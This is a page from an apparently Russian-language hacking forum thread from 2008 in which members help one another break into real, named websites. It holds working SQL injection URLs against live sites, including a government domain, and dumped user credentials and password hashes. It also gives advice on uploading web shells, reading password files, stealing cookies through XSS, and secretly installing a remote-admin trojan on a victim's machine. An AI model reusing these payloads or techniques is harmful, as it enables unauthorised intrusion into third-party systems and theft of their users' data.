PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

Велемир
26.07.2008, 23:46
тебя редиректит.... скуля там.. да вроде единственная возможность на этом сайте подставить ковычку


А почему он тогда редиректит,если я передаю ссылку

http://www.mutu.ro/ro_guestbook.php?st=10

Gorev
26.07.2008, 23:47
а вот не знаю

Велемир
26.07.2008, 23:53
Сканер отнёс это к еррорам,любые действия редиректятся).XSS зато куча )

Велемир
27.07.2008, 01:38
Так,мошь кто ломал Плеск,поможет.

Программа: Plesk 8.1.1 для Windows и более ранние версии.

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленном пользователю получить доступ к важным данным на системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "locale_id" в сценариях login.php3, login_up.php3 и top.php3. Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе

Вот такой вопрос... Версия сайта попадает под это описание,но не передаётся там параметр locale_id.Что тогда делать ? Дыра идёт мимо меня?))

Вот пример пост формочки:

<form name="form2" action="/login_up.php3" method="post" onSubmit="return login_oC(document.forms[0], document.forms[1])">
<table class="formFields" cellspacing="0" width="100%">
<tr>
<td class="name"><label for="passwd"> Password</label></td>

<td><input type="password" name="passwd" id="passwd" size="25" maxlength="14" tabindex="2"></td>
</tr>

<tr>
<td class="name"><label for="fid-locale">Interface language</label></td>
<td><select name="login_locale" id="fid-login_locale" onChange="locale_oC(document.forms[0], document.forms[1])"> <option value='default' SELECTED>User default</option>
<option value='en-US'>ENGLISH (United States)</option>
</select>

</td>
</tr>
</table>

<input type="hidden" name="login_name" value="">
</form>


Может я слепой,но всё же...

n0ne
27.07.2008, 02:35
Велемир, в html-исходнике ты не найдешь ничего. То что ты скинул - факт работы пхп и шаблонов. Дай сайт в личку - может помогу :)

А если ты хочешь увидеть почему в этом месте уязвимость - тебе нужны исходники.

Велемир
27.07.2008, 03:45
Так ведь параметры должны передаваться скрипту через хтмл форму.Исходник полюбому не достать - прав нету,если ты про исходники того сервера ). Ну а паблик и так понятно...

immortal16
27.07.2008, 13:22
подскажите плиз нубу т.е. мне :
я тут одним трояном заинтересовался(radmin 3.2) faq и все прилагающееся прочитал но понял меньше половины разъясните плиз:
1. там два инсталера было один viewer второй server. так сервер у ся распаковывать или у жертвы.если у ся то жертве скидывать r_server.exe AdmDll.dll raddrv.dll правильно?2.как етот сервер настроить?
3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая (тада как ей пользоваться!
4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?
5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?

Gorev
27.07.2008, 13:43
поиск на ачате скрытый радмин тебе всё обьяснит

o3,14um
27.07.2008, 18:29
Есть такая ситуация при инклудах и sql-inj, когда пишешь например
?file=./.
?id=-1+select+1,2,load_file('/etc/.'),4/*
и на экран выводится содержимое каталога. Но это срабатывает не всегда, вот я и хотел бы знать, в каких случаях срабатывает.
От чего это зависит? От ОСи, файловой сис-мы или ещё от чего-то?

geezer.code
27.07.2008, 18:33
o3,14um
во-первых от того есть ли этот каталог.
во-вторых как подмножество первого от ОСи.
в-третих от прав доступа с которыми работает мускул.
есть ищо много
в-****

BlackSun
27.07.2008, 18:41
Есть такая ситуация при инклудах и sql-inj, когда пишешь например
?file=./.
?id=-1+select+1,2,load_file('/etc/.'),4/*
и на экран выводится содержимое каталога. Но это срабатывает не всегда, вот я и хотел бы знать, в каких случаях срабатывает.
От чего это зависит? От ОСи, файловой сис-мы или ещё от чего-то?
У текушего mysql-юзера прав не хватает

o3,14um
27.07.2008, 19:08
спасибо за ответы. Но думаю что ещё не помешао бы пару советов:

Когда есть возможность читать файлы на сервере через мускул инъекцию, но заливать возможности нет (ковычки экранизируются), что посоветуете прочесть, для того чтобы залить шелл? Конфиги читал - на руках пароли от мускул сервера, но коннект только локальный. К ФТП пароли не подходят (то бишь мот и подходят, я просто адрес фтп не нашёл). По каталогам рыться нет возможности - можно только если знаешь где именно файл лежит или подбирать путь наугад, но у меня на руках путь до папки веб-сервера с сайтом. /etc/passwd - никакой инфы не дал (не прокатило логин:логин)
админку не нашёл, даже от форума
тяжёлая ситуация, правад?))

BlackSun
27.07.2008, 19:17
спасибо за ответы. Но думаю что ещё не помешао бы пару советов:

Когда есть возможность читать файлы на сервере через мускул инъекцию, но заливать возможности нет (ковычки экранизируются), что посоветуете прочесть, для того чтобы залить шелл? Конфиги читал - на руках пароли от мускул сервера, но коннект только локальный. К ФТП пароли не подходят (то бишь мот и подходят, я просто адрес фтп не нашёл). По каталогам рыться нет возможности - можно только если знаешь где именно файл лежит или подбирать путь наугад, но у меня на руках путь до папки веб-сервера с сайтом. /etc/passwd - никакой инфы не дал (не прокатило логин:логин)
админку не нашёл, даже от форума
тяжёлая ситуация, правад?))
Вариантов много ..
- сделай select пароля рута из таблицы mysql.user (если прав хватит), потом нарой phpmyadmin и через него залей шелл
- если прав хватит прочитай /etc/shadow или /etc/master.passwd
- если есть одминка, попробуй через нее, обычно одминки не славятся зашитой
- заюзай http://2ip.ru/server.php, прочитай конфиги соседних сайтов, попробуй залить шелл через них
- если есть cPanel или DirectAdmin или тп, прочитай их конфиги ..
Все зависит от прав .. импровизируй)

geezer.code
27.07.2008, 19:19
o3,14um
адрес фтп - совпадает с ip. нужно только знать логин.

o3,14um
27.07.2008, 19:27
- сделай select пароля рута из таблицы mysql.user (если прав хватит), потом нарой phpmyadmin и через него залей шелл
я писал:
на руках пароли от мускул сервера, но коннект только локальный

если есть одминка, попробуй через нее, обычно одминки не славятся зашитой


опять таки я писал:
админку не нашёл, даже от форума

- если прав хватит прочитай /etc/shadow или /etc/master.passwd
- заюзай http://2ip.ru/server.php, прочитай конфиги соседних сайтов, попробуй залить шелл через них
- если есть cPanel или DirectAdmin или тп, прочитай их конфиги ..
шэдоу и мастер не прочитать, сайт там 1, все конфиги что нашёл - прочёл, но нифига кроме паролей от БД, которые у меня уже есть не нашёл и cPanel или DirectAdmin там нет.

Все зависит от прав .. импровизируй)
вот когда моя фантазия иссякает, я и обращаюсь за помощью))


2geezer.code, там походу ФТП-сервера вообще нет или висит на другом порту. Впринципе и не думаю. что если он там есть, то пароль совпадёт

BlackSun
27.07.2008, 19:33
Попробуй к ssh по мускульному паролю или к удаленному рабочему приконектится

Rejjin
27.07.2008, 20:24
есть ли какие-либо онлайн-сервисы по сканированию сайта?

BlackSun
27.07.2008, 20:40
есть ли какие-либо онлайн-сервисы по сканированию сайта?
http://www.google.com/search?client=opera&rls=ru&q=%D0%9E%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD+%D1%83%D1%8 2%D0%B8%D0%BB%D0%B8%D1%82%D1%8B&sourceid=opera&ie=utf-8&oe=utf-8

Ershik
27.07.2008, 22:30
есть ли какие-либо онлайн-сервисы по сканированию сайта?
подойдет?
http://madnet.name/tools/madss/

Велемир
28.07.2008, 01:42
Кто-нить знает поля в таблице phpmyadmin.pma_table_info ?

И ещё какие-нибудь полезные таблички оттуда с полями : )

Велемир
28.07.2008, 02:37
http://www.fm.gov.lv/index.php?id=8-8=5+and+ascii(substring((select+password+from+user s+limit+1,1),1,1))=100/*

Почему не выходит посимвольный перебор ? оООО

DDoSька
28.07.2008, 07:24
Кто-нить знает поля в таблице phpmyadmin.pma_table_info ?

И ещё какие-нибудь полезные таблички оттуда с полями : )
нету полезных,я специально на локалхосте посмотрел,и не нашел =\

The_XOPb
28.07.2008, 08:54
Мир вам, бывалые хакеры! Я вот только начал постигать эту науку. Почитал кой-чё на вашем форуме, поискал в инете дырявые сайтики... Нашёл кой-чё! И теперь у меня вот такой вопрос по XSS-уязвимостям: если строка поиска на сайте пропускает в себя такое <script>alert("boo");</script> и выполняет это на странице результатов поиска, то могу ли я как-то дефейснуть сайт через это? или украсть куки других юзеров этого ресурса? или подключить к сайту свой js-файл?

С уважением, ламер!

MaSTeR GэN
28.07.2008, 11:07
2The_XOPb если не фильтруеться стока поиска это пассивная xss сделать практически с ней не чего нельзя !ток попробовать подкинуть пользователелю и украсть куки что мало вероятно!
http://forum.antichat.ru/thread20140.html

The_XOPb
28.07.2008, 11:16
Спасибо MaSTeR GэN! Но, великое братство мегахакеров, продолжу вас мучить тупыми вопросами! Есть ресурс, у которого при пустом значении поиска выводится страница со следующим сообщением "Template->loadfile(): No file specified for handle search_block". Это можно для какого-нить хулиганства использовать?

С уважением, пока всё ещё ламер!

Bonnie and Clyde
28.07.2008, 11:25
Спасибо MaSTeR GэN! Но, великое братство мегахакеров, продолжу вас мучить тупыми вопросами! Есть ресурс, у которого при пустом значении поиска выводится страница со следующим сообщением "Template->loadfile(): No file specified for handle search_block". Это можно для какого-нить хулиганства использовать?

С уважением, пока всё ещё ламер!
http://php.ru/manual/function.sdo-das-xml-loadfile.html
если это поле загружает PDF документы, тогда читай это: http://www.xakep.ru/magazine/xa/102/054/1.asp
или же вероятно это просто ошибка кода: http://php.ru/forum/viewtopic.php?t=1372&start=150&sid=1738c1dccca7303763afa8c7d7dcea90
Ну и уже если все три варианта не сработали, тогда это тебе точно поможет: http://www.webmasterworld.com/forum88/7281.htm

The_XOPb
28.07.2008, 12:28
Спасибо тебе Bonnie! И тебе Clyde! :) Будет повод подучить английский!

big_BRAT
28.07.2008, 12:56
http://www.lutherie-guitare.org что за движек? на самописный вроде не похож....
_http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet=Doc&numero=260'--
вроде как и значение не фильтруется? но запрос такого вида проходит... _http://www.lutherie-guitare.org/Main.php?do=Detailler&submit=detaillerObjet&objet=Doc&numero=260sdfsdf
уже замаялся, кто поможет, нуна получить админа

Велемир
28.07.2008, 15:50
нету полезных,я специально на локалхосте посмотрел,и не нашел =\

Ужась.... =_____________=

Ershik
28.07.2008, 20:31
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html

Получается следующее:

http://www.avia.ru/pr/?id=-1'+order+by+1--


Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1' order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13
Order by запрещен??

sabe
28.07.2008, 20:45
Ershik
а там есть скуль? ругается на неверный даныные int

Ershik
28.07.2008, 20:47
А смысл?
Warning: pg_exec() query failed: ERROR: invalid input syntax for integer: "-1 order by 1--" in /var/www/www.avia.ru/htdocs/pr/index.php on line 13

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/www.avia.ru/htdocs/pr/index.php on line 14

З.Ы. Я тоже, по статье делаю.

DDoSька
29.07.2008, 01:34
ВСем Прюэт!
Есть такая уязвимость в MKportale 1.1:
_http://www.securityfocus.com/archive/1/485035
: Discovery by:
Sw33t h4cK3r
: POWERED BY
: MKPortal M1.1
Exploit :
http://Example.com
index.php?ind=gallery&op=foto_show&ida=(sql)
Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :-)

~!DoK_tOR!~
29.07.2008, 02:38
скачай исходники двига и помотри таблички и колонки )

Андрюша
29.07.2008, 02:45
скуль инекцыя
для начала узнай версию мускула

DDoSька
29.07.2008, 02:54
скачай исходники двига и помотри таблички и колонки )
Так это не проблема,только вот раскрутить не получаеться =(

MaSTeR GэN
29.07.2008, 10:34
2DDoSька так я не понял в чем заключаеться вопрос ? дай линк то хотя бы что можно в ПМ просто по описанию эт обычноая скуль иньекция ;)
2Ershik там нету иньекции входяшие значения приводяться к integer о чем и говорит ошибка ;)

Bonnie and Clyde
29.07.2008, 15:26
ВСем Прюэт!
Есть такая уязвимость в MKportale 1.1:
_http://www.securityfocus.com/archive/1/485035
: Discovery by:
Sw33t h4cK3r
: POWERED BY
: MKPortal M1.1
Exploit :
http://Example.com
index.php?ind=gallery&op=foto_show&ida=(sql)
Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :-)
там blin sql-inj

http://milw0rm.com/exploits/4179

s_p_a_m
29.07.2008, 15:31
как залить шелл через скуль инжект? знаю путь где лежит сайт, с помощью подзапросов (substring((select+user())..... вывел чудесное слово Root, короче все это не важно, меня интересует как залить шелл через скулю ?

aka PSIH
29.07.2008, 15:33
s_p_a_m
_https://forum.antichat.net/showthread.php?t=34338

o3,14um
29.07.2008, 15:40
s_p_a_m
если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)

s_p_a_m
29.07.2008, 15:47
s_p_a_m
_https://forum.antichat.net/showthread.php?t=34338

выводимых полей нет

s_p_a_m
29.07.2008, 15:53
s_p_a_m
если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)

каким образом вытянуть пароли ? выводимых полей нет? поделись знаниями, так как я такой скулей первый раз работаю :)

o3,14um
29.07.2008, 15:57
зайди в раздел СТАТЬИ данного форума ;-)

MaSTeR GэN
29.07.2008, 21:15
бред зачем выводимые поля при залитии шелла ??? тебе нужно знать имя хотя бы одной таблицы и установочную директорию если есть filepriv насколь я понял у тебя root тогда лей спокойно через into outfile !

o3,14um
30.07.2008, 00:06
можно и не знать ни одного имени таблы и лить спокойно можно если ковычки не экранизируются

MaSTeR GэN
30.07.2008, 11:39
Хм не чего не пойму )
http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
запросы такого рода проходят а что то типа
http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
выдает ошибку типа:
right syntax to use near 'GROUP BY downloads.id
если завершить запрос "--" or "*/" то ошибка такого рода :
"Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
подскажите в чем проблема ?

aka PSIH
30.07.2008, 11:45
MaSTeR GэN
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1/*
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())/*

laptops_main@localhost:4.0.23-standard:laptops_mai

вывод в title

Велемир
30.07.2008, 13:36
Ладно поф с этим сайтом.А на лаптопы эти забей,их уже тыща человек ломала)

durito
30.07.2008, 22:07
очень странный ответ в MS Access:

http://xxx.com/Detail.asp?ad_id=2968+order+by+1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Missing semicolon ( ; ) at end of SQL statement.

/adDetail.asp, line 258

кто сталкивался с подобным и что это?

prescott
31.07.2008, 01:28
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html

Получается следующее:

http://www.avia.ru/pr/?id=-1'+order+by+1--



Order by запрещен??

вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...

prescott
31.07.2008, 01:46
Хм не чего не пойму )
http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
запросы такого рода проходят а что то типа
http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
выдает ошибку типа:
right syntax to use near 'GROUP BY downloads.id
если завершить запрос "--" or "*/" то ошибка такого рода :
"Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
подскажите в чем проблема ?

В запросе используется одна из функций (MIN(),MAX(),COUNT().. При их использовании обязательна группировка по одному из полей, а ты обрезаешь завершающий групбай комментарием...

http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+1/* вот так надо

USAkid
01.08.2008, 02:27
Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается :D

sabe
01.08.2008, 03:42
вот сайт про медведа......
http://viperson.ru/main.php?arcnews=1+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30/*&M_sel=200808
там уязвимых переменных много.. но неодну не вышло разкрутить.. толи я спать хочу толи еще чтот )
http://viperson.ru/main.php?sort=9999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*
кароч. смотрите...


и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?

o3,14um
02.08.2008, 10:19
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
+1

Fuckel
02.08.2008, 10:33
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд

n0ne
02.08.2008, 11:01
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?

Если админ не хранит их в текстовике memory.txt (:D), то только надеяца, что пассы от бд или ещё чего-нибудь совпадут с фтп.

USAkid
02.08.2008, 11:48
Подскажите какие таблицы можно использовать еще, если при таком запросе:

http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--

вылазит:

SELECT command denied to user: 'user@host' for table 'table' ?

The matrix
02.08.2008, 12:12
Подскажите какие таблицы можно использовать еще, если при таком запросе:

http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--

вылазит:

SELECT command denied to user: 'user@host' for table 'table' ?

Использовать те таблицы, к которым имеет доступ юзер под которым ты подключен к бд ;)
к INFORMATION_SCHEMA доступа нет пробуй вручную перебирать или посредством скриптов.

satana8920
02.08.2008, 14:52
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда

Jokester
02.08.2008, 15:22
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
Объясняю раз и на всегда: :D
В запросе скорее всего 2 селекта
почитай это :
http://forum.antichat.ru/threadnav43966-3-10.html

satana8920
02.08.2008, 15:30
я так понял мне надо подзапросы использовать?если да то как это осуществить?

Grey
02.08.2008, 16:39
я так понял мне надо подзапросы использовать?если да то как это осуществить?

Прочитать про посимвольный перебор, а так же про подзапросы (да и про многое другое) можно здесь: https://forum.antichat.ru/threadnav43966-1-10.html

http://www.irintech.com/x1/blogarchive.php?id=764+and+1=1 - запрос выполняется правильно, результат запроса не меняется
http://www.irintech.com/x1/blogarchive.php?id=764+and+1=2 - запрос выполняется не правильно, результат запроса меняется

Таким образом посимвольно выводи нужную тебе информацию (для начала нужно вывести версию, т.к. подзапросы доступны начиная с версии 4.1), только делать это руками не рационально, лучше скриптом или программой:

version(): 4.1.11-Debian_4sarge7
user(): db35109_rooted@10.1.3.24
database(): db35109_x1

Т.к. версия БД => 4.1 то использовать подзапросы можно:

http://www.irintech.com/x1/blogarchive.php?id=764+and+(select+1)=1 - это уже пример подзапроса

Дальше тебе нужно брутить таблицы, могу попробывать если хочешь (т.к. я сейчас занимаюсь тестированием своего скрипта, который как раз работает со слепыми инъекциями), если найдутся какие либо (займет поиск часа 2-3), то добавлю инфу в этот же пост.

А вот и найденые таблицы:

Имена таблиц взяты из файла: lib_and_data/grey_table_name.txt
Всего: 1559 имён таблиц
Найдено таблиц: 2
admin
user

Колонки к таблице admin:

Подбор имён колонок к таблице: admin
Найдено колонок: 1
id

Колонки к таблице user:

Подбор имён колонок к таблице: user
Найдено колонок: 4
id
username
email
password

Жаль что колонки к таблице с админами не сбрутились, надо будет мне состряпать словарь с именами колонок, а то того что юзаю я пока не хватает.

Вывел данные из таблиц, может пригодится:

Вывод результата запроса: (select id from admin limit 0,1)
length((select id from admin limit 0,1)): 1
(select id from admin limit 0,1): 1

Вывод результата запроса: (select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1)
length((select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1)): 45
(select concat(id,char(58),email,char(58),username,char(58 ),password) from user limit 0,1): 35:jean:jean:3308150413ecf9da841f9a9dd90309ba

o3,14um
03.08.2008, 12:01
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд

а хера его обходить. Ведь меняется только текст в урле.
Вот тебе Яркий пример:

https://forum.antichat.ru/showthread.php?t=27498
и
https://forum.antichat.ru/thread27498.html

одно и тоже (обязательно прочти статью по этим линкам)

Единственное, что сложно подбирать правильный урл. Другого способа, отличного от подбора не знаю. Впринципе особо не интересовался. Погугли, может найдёшь что-нить. А если найдёшь, то скинь в личку ссылок =)

eLWAux
03.08.2008, 23:56
привет. я только учусь =)
нашол SQL на http://www.aquarell-sts.ru/products/index.php?id=50'
подобрал количество: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+1,2,3/* - вот, вроде, 3 =)
также могу подставить вместо 2 например user(), database(), etc..

НО пробую так:
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+mysql .user/*
в ответ:
SELECT command denied to user 'a2513_aquarell'@'lbarbero-15.m-10.ru' for table 'user'
типа команда SELECT для юзера a2513_aquarell ЗАпрещена =(

что мне делать? =*)

159932
04.08.2008, 00:01
тебе запрещён селект из таблы юзер .. тк кк версия 4ая - ищи другие таблы ..

eLWAux
04.08.2008, 00:08
таблици искать перебором?
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+table/*

и table перебереть брутом?

eLWAux
04.08.2008, 00:10
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)

Ded MustD!e
04.08.2008, 00:21
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)

http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,concat(login,0x3a,pwd),333+from +users/*

Пароли в открытом виде, админка:

http://www.aquarell-sts.ru/admin/

eLWAux
04.08.2008, 01:06
Ded MustD!e:
СПАСИБО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
а если не секрет мож мне россказать как ти узнал про login и pwd?

sabe
04.08.2008, 01:58
eLWAux
он их просто подобрал (угадал).

USAkid
04.08.2008, 03:27
http://www.mbc.edu - сайт

/news/r_detail.asp?id=2087+union+select+1,2,3,4,5,6,7/* - точное кол-во.
Но вывод куда-то пропал :confused: . Нигде нету.
Это blind injection ?

159932
04.08.2008, 03:34
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
======================
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_ hash),3,4,5,6,7+from+user/*
что за тип хеша - не знаю :D
можт кодировка !?

USAkid
04.08.2008, 03:35
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*

Ух какая в минусе сила. Спасибо! :)

Угу, чет хэш загадочный. :eek: ... Пойду гуглить.

USAkid
04.08.2008, 06:55
Пытаюсь сделать
script.php?id=199'union+select+1,2,user(),4,5,6,7, 8,9,10/*
а вылазит:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
SELECT *, UNIX_TIMESTAMP(`itemdate`) AS `unix_time` FROM `umsec_news_items` WHERE `id`='199'union select 1,2,user(),4,5,6,7,8,9,10/*'

Ладно, кодирую в hex
script.php?id=-113'+union+select+1,2,0x76657273696f6e2829,4,5,6,7 ,8,9,10/*
А там где должна быть инфа о версии показывает тупо слово version()

Можно где-нить об етом почитать или что-нить узнать подробнее?

aka PSIH
04.08.2008, 07:20
USAkid
aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),vers ion(),database()),0x71),0x71)

Можно где-нить об етом почитать или что-нить узнать подробнее?
про это уже миллион раз писали на ачате..

sabe
04.08.2008, 07:21
USAkid
script.php?id=199'union+select+1,2,user(),4,5,6,7, 8,9,10/*
или использовать конструкцию unhex(hex())
script.php?id=199'union+select+1,2,unhex(hex(user( ))),4,5,6,7,8,9,10/*
кстати намного удобнее чем aes_decrypt(aes_encrypt,0x71),0x71)

Ershik
04.08.2008, 07:25
Зачем в Hex кодировать? У вас проблемы с кодировкой.
Попробуйте вот это:
aes_decrypt(aes_encrypt(любое твоё слово,0x71),0x71)
Или в convert(version() using latin1)

Redyps
04.08.2008, 10:47
проще всего имхо cast(version()+as+binary)

*eXe*
04.08.2008, 13:29
имею доступ к панели управления http://www.neo-nvk.ru/newsphp/newsok/admin.php
а на фтп немогу приконектится. конектится вроде нормально... пароль и логин признаёт.. а потом срывается
Response: 550 Permission denied.
Error: Could not retrieve directory listing

aka PSIH
04.08.2008, 13:32
*eXe*
по IP блокирует ;)

*eXe*
04.08.2008, 13:37
aka PSIH
а разблокируется только с админки?

Redyps
04.08.2008, 14:02
омг, это с каких пор штацес блокирует конект по фтп? aka PSIH, вы бредите

aka PSIH
04.08.2008, 14:05
мля, сорри сорри )))
прочитал только первую и последние строчки...

тогда

550
Запрошенная функция не реализована, файл не доступен, например, не найден


/me стыдно :(

*eXe*
04.08.2008, 16:41
black-list.gu.ma
что можете сказать?*??
вроде что то опасное

BlackSun
04.08.2008, 16:46
black-list.gu.ma
что можете сказать?*??
вроде что то опасное
Найденная мной одна из кссок на ксакепе, заюзанная челом с ником Tray)

sabe
04.08.2008, 20:49
где phpmyadmin хранит пароли?

Grey
04.08.2008, 21:06
где phpmyadmin хранит пароли?

Наиболее частые случаи (везде по разному):

1. Базовая авторизация на директории с ПМА (т.е. информация о БД прописана в файл), а за доступ к директории отвечают файлы .htaccess и .htpasswd
2. Данные для подключения к БД нигде не хранятся, а вводятся ползователем, т.е. логин который он просит ввести это логин пользователя БД, а пароль соответтвенно пароль указанного пользователя БД.
3. Вроде ещё в самой БД может хранится.

sabe
04.08.2008, 21:23
Grey
понятно.. в моем случаи логин и пасс пользователя БД есть но нехватает прав чтобы просмотреть mysql.user, хотел узнать пасс рута.. я имею доступ к папке phpmyadmin через шелл.. просморев файлы нече не нашел... спасибо....

DDoSька
04.08.2008, 21:24
3. Вроде ещё в самой БД может хранится.
Так в mysql.user и храняться пассы

4.Пассы хроняться в куках ;))

sabe
04.08.2008, 21:28
DDoSька
да...... но прав чтобы просмотреть нету.

и еще как я знаю.. что вся база данных mysql хранится в файлах на сервере?

o3,14um
05.08.2008, 01:06
1 попробуй пароли что нарыл к фтп
2 если есть права - можешь протроянить пхпмуфдмин(чтобы введённые пассы сохранялись в лог)

*eXe*
05.08.2008, 07:41
омг, это с каких пор штацес блокирует конект по фтп? aka PSIH, вы бредите

я заходил через ай пи сервака

Для доступа по FTP используйте в качестве hostname (адрес хоста) IP сервера.
Информация аккаунта:
Домен: neo-nvk.ru
IP сервера*: 77.222.40.12
Status: Connecting to 77.222.40.12 ...
Status: Connected with 77.222.40.12. Waiting for welcome message...
Response: 220 (vsFTPd 1.2.2)
Command: USER ********
Response: 331 Please specify the password.
Command: PASS *********
Response: 230 Login successful.
Command: FEAT
Response: 211-Features:
Response: MDTM
Response: REST STREAM
Response: SIZE
Response: 211 End
Command: SYST
Response: 215 UNIX Type: L8
Status: Connected
Status: Retrieving directory listing...
Command: PWD
Response: 257 "/"
Command: TYPE A
Response: 200 Switching to ASCII mode.
Command: PASV
Response: 550 Permission denied.
Error: Could not retrieve directory listing

Велемир
05.08.2008, 16:24
Кто может сказать,где лежат файлы .htpasswd,.htaccess и .bash_history ?И ещё: для чтения нужны права рута от бд или системы ? А также есть ещё одна вещь,которой я никак не пойму: Смысл делать имя сервера совападающее с алиасом (вида www5.site.com),если сам сайт - www.site.com.Непонятно...Дело в том,что по алиасу такого сайта по хттр протоколу не существует,а site.com есть.Пинги доходят до обоих(Один из них виртуальный хостинг,а другой хостящийся на нём сайт).Анадиз показал,что они находятся в одной подсети на разных машинах.Путь до логов на вирт. хостинге и на хостящемся на нём чсайте отличаются(вполне логично), но одни существуют,а другие - нет.Как такое объяснить ?

n0ne
05.08.2008, 17:44
Велемир, .htpasswd и .htaccess могут лежать где угодно. Но чаще всего .htpasswd лежит или в корне или рядом с .htaccess, который, в свою очередь лежит, чаще всего, в папке, которая им защищена, или тоже в корне :) Права бд тут не при чем. А права системы нужны в зависимости от того какой уровень доступа поставил админ.

Последний вопрос не понял о_О

Redyps
05.08.2008, 17:45
Кто может сказать,где лежат файлы .htpasswd,.htaccess и .bash_history ?И ещё: для чтения нужны права рута от бд или системы ?
ну htpasswd и htaccess лежать могут где угодно в корне сайта
